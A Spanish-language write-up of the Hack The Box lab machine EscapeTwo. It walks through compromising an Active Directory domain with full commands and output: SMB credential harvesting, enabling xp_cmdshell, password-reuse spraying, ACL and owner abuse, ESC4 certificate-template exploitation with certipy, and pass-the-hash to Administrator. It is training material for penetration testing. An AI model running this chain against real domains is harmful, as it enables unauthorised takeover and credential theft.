Descripción
EscapeTwo es una máquina fácil de Hack The Box que cuenta con las siguientes vulnerabilidades:
- Acceso inicial utilizando un escenario de supuesto robo de acceso que conduce al descubrimiento de un recurso compartido SMB
- Recurso compartido SMB con hoja de cálculo dañada revela las credenciales del Administrador de la base de datos
- El administrador de la base de datos puede ejecutar comandos y leer un archivo con credenciales.️
- El usuario tiene el permiso
WriteOwnersobre el propietario de la Autoridad de Certificación - La contraseña del usuario de la Autoridad de Certificación se puede cambiar
- Escalada de privilegios mediante una vulnerabilidad en un plantilla de certificación
Reconocimiento
Primero, vamos a comprobar con el comando ping si la máquina está activa y el sistema operativo. La dirección IP de la máquina de destino es 10.129.241.157.
$ ping -c 3 10.129.241.157
PING 10.129.241.157 (10.129.241.157) 56(84) bytes of data.
64 bytes from 10.129.241.157: icmp_seq=1 ttl=127 time=53.8 ms
64 bytes from 10.129.241.157: icmp_seq=2 ttl=127 time=54.2 ms
64 bytes from 10.129.241.157: icmp_seq=3 ttl=127 time=53.2 ms
--- 10.129.241.157 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 53.226/53.739/54.216/0.405 ms
La máquina está activa y con el TTL que equivale a 127 (128 menos 1 salto) podemos asegurar que es una máquina de Windows. Ahora vamos a hacer un escaneo de puertos de Nmap TCP SYN para comprobar todos los puertos abiertos.
$ sudo nmap 10.129.241.157 -sS -oN nmap_scan
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.054s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 5.68 seconds
Obtenemos muchos puertos abiertos, relacionados con un entorno Active Directory.
Enumeración
Luego hacemos un escaneo más avanzado, con la detección de la versión de los servicios y el uso de scripts.
$ nmap 10.129.241.157 -Pn -sV -sC -p53,88,135,139,389,445,464,593,636,1433,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.241.157:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.241.157:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-09T13:11:12
|_Not valid after: 2055-01-09T13:11:12
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.53 seconds
Obtenemos los servicios relacionados con un Directorio Activo, específicamente el Controlador de Dominio DC01.sequel.htb. Agregamos los hosts a nuestro archivo local /etc/hosts.️
$ echo "10.129.241.157 sequel.htb" | sudo tee -a /etc/hosts
$ echo "10.129.241.157 DC01.sequel.htb" | sudo tee -a /etc/hosts
Tenemos las credenciales del usuario rose con la contraseña KxEPkKe6R8su como supuesta brecha, por lo que vamos a empezar enumerando a los usuarios y los recursos compartidos SMB.️
$ netexec smb sequel.htb -u rose -p KxEPkKe6R8su --users --shares
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.241.157 445 DC01 [*] Enumerated shares
SMB 10.129.241.157 445 DC01 Share Permissions Remark
SMB 10.129.241.157 445 DC01 ----- ----------- ------
SMB 10.129.241.157 445 DC01 Accounting Department READ
SMB 10.129.241.157 445 DC01 ADMIN$ Remote Admin
SMB 10.129.241.157 445 DC01 C$ Default share
SMB 10.129.241.157 445 DC01 IPC$ READ Remote IPC
SMB 10.129.241.157 445 DC01 NETLOGON READ Logon server share
SMB 10.129.241.157 445 DC01 SYSVOL READ Logon server share
SMB 10.129.241.157 445 DC01 Users READ
SMB 10.129.241.157 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.241.157 445 DC01 Administrator 2024-06-08 16:32:20 0 Built-in account for administering the computer/domain
SMB 10.129.241.157 445 DC01 Guest 2024-12-25 14:44:53 0 Built-in account for guest access to the computer/domain
SMB 10.129.241.157 445 DC01 krbtgt 2024-06-08 16:40:23 0 Key Distribution Center Service Account
SMB 10.129.241.157 445 DC01 michael 2024-06-08 16:47:37 0
SMB 10.129.241.157 445 DC01 ryan 2024-06-08 16:55:45 0
SMB 10.129.241.157 445 DC01 oscar 2024-06-08 16:56:36 0
SMB 10.129.241.157 445 DC01 sql_svc 2024-06-09 07:58:42 0
SMB 10.129.241.157 445 DC01 rose 2024-12-25 14:44:54 0
SMB 10.129.241.157 445 DC01 ca_svc 2024-12-25 22:07:38 0
SMB 10.129.241.157 445 DC01 [*] Enumerated 9 local users: SEQUEL
Tenemos acceso de lectura a una carpeta compartida, Accounting Department, y los usuarios enumerados son: Administrator, ryan, oscar, sql_svc, rosa y ca_svc. Si enumeramos la carpeta, encontramos dos hojas de cálculo: accounting_2024.xlsx y accounts.xlsx. Las extraemos.️
$ smbclient '\\sequel.htb\Accounting Department' -U 'rose%KxEPkKe6R8su'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 12:52:21 2024
.. D 0 Sun Jun 9 12:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 12:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 12:52:07 2024
6367231 blocks of size 4096. 849888 blocks available
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (34,9 KiloBytes/sec) (average 34,9 KiloBytes/sec)
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (23,1 KiloBytes/sec) (average 29,0 KiloBytes/sec)
Si intentamos abrirlas encontramos que están dañadas. Como el archivo .xlsx es un archivo .zip, vamos a extraer el archivo accounts.xlsx y revisar sus contenidos.️
$ unzip accounts.xlsx -d accounts
Archive: accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: accounts/xl/workbook.xml
inflating: accounts/xl/theme/theme1.xml
inflating: accounts/xl/styles.xml
inflating: accounts/xl/worksheets/_rels/sheet1.xml.rels
inflating: accounts/xl/worksheets/sheet1.xml
inflating: accounts/xl/sharedStrings.xml
inflating: accounts/_rels/.rels
inflating: accounts/docProps/core.xml
inflating: accounts/docProps/app.xml
inflating: accounts/docProps/custom.xml
inflating: accounts/[Content_Types].xml
En el archivo accounts/xl/sharedStrings.xml se encuentran las credenciales de usuario para los usuarios angela, oscar, kevin y sa.️
$ xmllint --format accounts/xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
<si>
<t xml:space="preserve">First Name</t>
</si>
<si>
<t xml:space="preserve">Last Name</t>
</si>
<si>
<t xml:space="preserve">Email</t>
</si>
<si>
<t xml:space="preserve">Username</t>
</si>
<si>
<t xml:space="preserve">Password</t>
</si>
<si>
<t xml:space="preserve">Angela</t>
</si>
<si>
<t xml:space="preserve">Martin</t>
</si>
<si>
<t xml:space="preserve">angela@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">angela</t>
</si>
<si>
<t xml:space="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml:space="preserve">Oscar</t>
</si>
<si>
<t xml:space="preserve">Martinez</t>
</si>
<si>
<t xml:space="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">oscar</t>
</si>
<si>
<t xml:space="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml:space="preserve">Kevin</t>
</si>
<si>
<t xml:space="preserve">Malone</t>
</si>
<si>
<t xml:space="preserve">kevin@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">kevin</t>
</si>
<si>
<t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
</si>
<si>
<t xml:space="preserve">NULL</t>
</si>
<si>
<t xml:space="preserve">sa@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">sa</t>
</si>
<si>
<t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>
sa es el administrador local del servidor de bases de datos Microsoft SQL Server y su contraseña es MSSQLP@ssw0rd!. Podemos conectarnos a la base de datos y intentar obtener ejecución remota de comandos utilizando la herramienta impacket-mssql.️
$ impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> xp_cmdshell whoami
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
No podemos ejecutar comandos porque el componente xp_cmdshell está desactivado.️
Explotación
Podemos activar el componente xp_cmdshell utilizando el comando enable_xp_cmdshell. Podemos ejecutar comandos como el usuario sequel\sql_svc.️
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULL
Explorando el sistema de archivos, encontramos un archivo, C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI, con credenciales relacionadas con la base de datos. La contraseña para el usuario sql_svc es WqSZAF6CysDQbGb3.️
SQL (sa dbo@master)> xp_cmdshell dir C:\
output
----------------------------------------------------------
...
11/05/2022 11:03 AM <DIR> PerfLogs
01/04/2025 07:11 AM <DIR> Program Files
06/09/2024 07:37 AM <DIR> Program Files (x86)
06/08/2024 02:07 PM <DIR> SQL2019
06/09/2024 05:42 AM <DIR> Users
01/04/2025 08:10 AM <DIR> Windows
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019
output
...
06/08/2024 02:07 PM <DIR> .
06/08/2024 02:07 PM <DIR> ..
01/03/2025 07:29 AM <DIR> ExpressAdv_ENU
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019\ExpressAdv_ENU
output
---------------------------------------------------------------
...
01/03/2025 07:29 AM <DIR> .
01/03/2025 07:29 AM <DIR> ..
06/08/2024 02:07 PM <DIR> 1033_ENU_LP
09/24/2019 09:03 PM 45 AUTORUN.INF
09/24/2019 09:03 PM 788 MEDIAINFO.XML
06/08/2024 02:07 PM 16 PackageId.dat
06/08/2024 02:07 PM <DIR> redist
06/08/2024 02:07 PM <DIR> resources
09/24/2019 09:03 PM 142,944 SETUP.EXE
09/24/2019 09:03 PM 486 SETUP.EXE.CONFIG
06/08/2024 02:07 PM 717 sql-Configuration.INI
09/24/2019 09:03 PM 249,448 SQLSETUPBOOTSTRAPPER.DLL
06/08/2024 02:07 PM <DIR> x64
...
SQL (sa dbo@master)> xp_cmdshell type C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
output
-------------------------------------------------
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
...
Verifiquemos si el contraseña se reutiliza para otro usuario en la red.️
$ netexec smb sequel.htb -u users -p 'WqSZAF6CysDQbGb3'
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.241.157 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
La contraseña se reutiliza para el usuario ryan. Vamos a intentar establecer una sesión remota utilizando la herramienta evil-winrm.️
$ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' Evil-WinRM shell v3.6
...
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
Obtenemos una sesión como usuario ryan.️
Post-Explotación
Utilicemos la herramienta PowerView para verificar debilidades en las ACLs del dominio.️
$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 . $ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
...
*Evil-WinRM* PS C:\Users\ryan\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\ryan\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Find-InterestingDomainAcl -ResolveGUIDs | ? {$_.IdentityReferenceName -eq "ryan"}
ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-548670397-972687484-3496335370-1114
IdentityReferenceName : ryan
IdentityReferenceDomain : sequel.htb
IdentityReferenceDN : CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
IdentityReferenceClass : user
Encontramos que el usuario ryan tiene la autorización de WriteOwner sobre el usuario con nombre Certification Authority.️
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Get-DomainUser "CN=Certification Authority,CN=Users,DC=sequel,DC=htb"
logoncount : 0
badpasswordtime : 6/9/2024 10:14:40 AM
distinguishedname : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : Certification Authority
lastlogontimestamp : 6/9/2024 10:14:42 AM
userprincipalname : ca_svc@sequel.htb
name : Certification Authority
El usuario Certification Authority tiene el nombre de usuario ca_svc. Con este acceso se puede reescribir al propietario del usuario ca_svc a ryan y cambiar su contraseña para poder operar. Se reescribirá al propietario con la herramienta impacket-owneredit, se cambiará la ACL con la herramienta impacket-dacledit y se cambiará la contraseña con la herramienta rpcclient.️
$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit.bak
[*] DACL modified successfully!
$ rpcclient -U 'sequel.htb/ryan%WqSZAF6CysDQbGb3' sequel.htb
rpcclient $> setuserinfo2 ca_svc 23 'new_password'
Una vez que tenemos acceso al usuario ca_svc, vamos a buscar vulnerabilidades en los plantillas de los Servicios de Certificados del Directorio Activo con la herramienta certipy-ad.️
$ certipy-ad find -username ca_svc@sequel.htb -password new_password -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
Encontramos una vulnerabilidad en la Autoridad de Certificación sequel-DC01-CA y su plantilla DunderMifflinAuthentication. ESC4 significa que el grupo SEQUEL.HTB\Cert Publishers tiene permisos peligrosos. Podemos abusar esta vulnerabilidad modificando la plantilla para activar otras vulnerabilidades y luego utilizarlas para generar un certificado de autenticación para el usuario Administrador. Comenzamos reescribiendo la plantilla, guardando la original.️
$ certipy-ad template -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Pedimos el certificado del administrador del dominio utilizando la nueva plantilla.️
$ certipy-ad req -ca sequel-DC01-CA -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -upn administrator@sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Finalmente obtenemos la autenticación utilizando el certificado para obtener la cadena del hash NTLM, 7a8d4e04986afa8ed4060f75e5a0b3ff.️
$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
Podemos iniciar sesión como el Administrador del dominio utilizando evil-winrm.️
$ evil-winrm -i sequel.htb -u 'Administrator' -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Flags
En la consola de administrador del dominio podemos recuperar las flags de usuario y administrador.️
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
<REDACTED>